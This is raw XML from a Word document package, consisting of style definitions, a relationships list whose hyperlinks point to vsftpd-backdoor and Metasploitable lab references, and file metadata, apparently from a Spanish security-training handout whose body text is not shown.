    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="960"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1440"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1920"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="108.0" w:type="dxa"/>
        <w:right w:w="108.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo7Car" w:customStyle="1">
    <w:name w:val="Título 7 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="001C3CE4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="243f60" w:themeColor="accent1" w:themeShade="00007F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo8Car" w:customStyle="1">
    <w:name w:val="Título 8 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="001C3CE4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="0000D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo9Car" w:customStyle="1">
    <w:name w:val="Título 9 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="001C3CE4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="0000D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo30" w:customStyle="1">
    <w:name w:val="Título3"/>
    <w:basedOn w:val="Ttulo3"/>
    <w:link w:val="Ttulo3Car0"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007D6CBE"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Estilo1" w:customStyle="1">
    <w:name w:val="Estilo1"/>
    <w:basedOn w:val="Ttulo3"/>
    <w:link w:val="Estilo1Car"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007D6CBE"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo3Car" w:customStyle="1">
    <w:name w:val="Título 3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:rsid w:val="00C15C1F"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo3Car0" w:customStyle="1">
    <w:name w:val="Título3 Car"/>
    <w:basedOn w:val="Ttulo3Car"/>
    <w:link w:val="Ttulo30"/>
    <w:rsid w:val="007D6CBE"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Estilo1Car" w:customStyle="1">
    <w:name w:val="Estilo1 Car"/>
    <w:basedOn w:val="Ttulo3Car"/>
    <w:link w:val="Estilo1"/>
    <w:rsid w:val="007D6CBE"/>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www.securitybydefault.com/2011/07/el-smile-de-la-muerte-puerta-trasera-en.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0x00sec.org/t/through-the-looking-glass-lame/19149" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/la-es/2011/07/05/backdoor-software-libre-vsftpd/"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6.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elladodelmal.com/2019/06/python-metasploit-libreria-pymetasploit.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523"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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/></Relationships>
</file>

<file path=word/_rels/footer3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tknika.eus" TargetMode="External"/><Relationship Id="rId2"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I0k7NI4EEtJtUB0/PLGeOFcF1Q==">CgMxLjAyDmguaXljYmxmYXFwY3c0Mg5oLm9wN2k4Y2JmcDFrMTIOaC5rdmdybnV6Z3pzYTEyDmguY3A0c25qdHN4b3N1Mg5oLm54MXZ2Z2hwaTk5OTIOaC5tZHFzZWh5dWg3dzcyDmguN3NjajdkYW5udTVwMg5oLmN5Mjc1YjNlNHpodTIOaC5obG50bWtycmp5c2oyDmguYnl3bDN5cjZtb2F5Mg5oLm9ocDBrcXVmYmFqODIOaC44bTdocmdhaGh5bHk4AHIhMUktaEVWQ0lqdFJZeGtTcjRmZjRjVms0bUNleXJjZi1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2020-07-16T11:14:00Z</dcterms:created>
  <dc:creator>Álvaro</dc:creator>
</cp:coreProperties>
</file>